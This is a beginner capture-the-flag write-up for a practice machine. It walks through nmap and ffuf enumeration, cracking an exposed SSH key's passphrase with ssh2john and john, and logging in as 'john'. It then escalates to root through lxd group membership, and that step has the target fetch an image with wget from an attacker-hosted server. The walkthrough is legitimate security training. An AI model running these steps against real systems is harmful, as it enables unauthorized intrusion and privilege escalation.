As this is a box more suitable for beginners, I'll be a bit more verbose in this writeup, enjoy :)
Nmap
Running
nmap -sC -sV -vv -oG nmap <MACHINE-IP>
Shows us 2 open ports:-
- 22 - running ssh
- 80 - http
Nmap command breakdown:-
- -sC -> Run default scripts
- -sV -> Enumerate service versions
- -vv -> Added verbosity
- -oG -> Output results in greppable format to a file called "nmap" in the current directory
Getting the user flag
First thing we have to do is check out the website and interact with it.
As we can see there are no user-controlled input fields, and there aren't many webpages we can check right off the bat.
At this stage it's worth checking each page's source code.
And immediately we discover a possible username from the home page, "john".
Nothing else interesting pops up, so we'll enumerate directories with ffuf.
Running
ffuf -s -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<MACHINE-IP>/FUZZ
Gives us 2 directories:-
- /uploads
- /secret
Let's check /uploads first.
We get 3 files, however, only the file "dict.lst" is important to us as it looks like a password list.
Now you can either copy and paste all of the content into a file on your machine, or you can do it the faster way using wget.
wget http://<MACHINE-IP>/uploads/dict.lst
Now we check out /secret, and we find an ssh key.
Use wget again to download it.
wget http://<MACHINE-IP>/secret/secretKey
Next, we'll use ssh2john to convert the key into a format John understands.
/usr/share/john/ssh2john.py secretKey > id_rsa
If you don't know where ssh2john is on your machine, you can find it by running this:
find / -name ssh2john.py 2>/dev/null
After that, we can use john, the password list we downloaded "dict.lst" and the "id_rsa" file ssh2john generated to crack the password for the key.
john id_rsa --wordlist=dict.lst
Ready to SSH?
Not yet, we need to change the permissions on the secretKey file, then we can ssh into the machine as john and get the user flag.
chmod 600 secretKey
ssh john@<MACHINE-IP> -i secretKey
Getting the root flag
As the title suggests, getting the "root flag" involves becoming root i.e escalating our privileges.
In most easy CTFs, this would be done by:-
- Running "sudo -l" to check what you can run with sudo, and then using GTFObins
- Checking the crontab at "/etc/crontab" to possibly "poison" some script
- Looking for other privesc vectors by running the LINPEAS script or pspy
However, these wouldn't work for this machine.
After following this Linux privilege escalation checklist from HackTricks, we discover that the user "john" belongs to the "lxd" group.
And searching for "lxd" on HackTricks again, the first result we get is related to privilege escalation.
In our case, we'd be using method #2 for privesc.
We first clone the repo and run the included script which outputs a tar file.
We'll also start a Python HTTP server to transfer the file to the target machine.
python3 -m http.server
Use wget to get the tar file onto the target machine:
wget http://<ATTACKER-IP>:8000/alpine<REST-OF-FILE-NAME>.tar.gz
And follow the rest of the steps from HackTricks.
Annnd we're root!
We just have to find where the root.txt file is and use cat to display its contents.
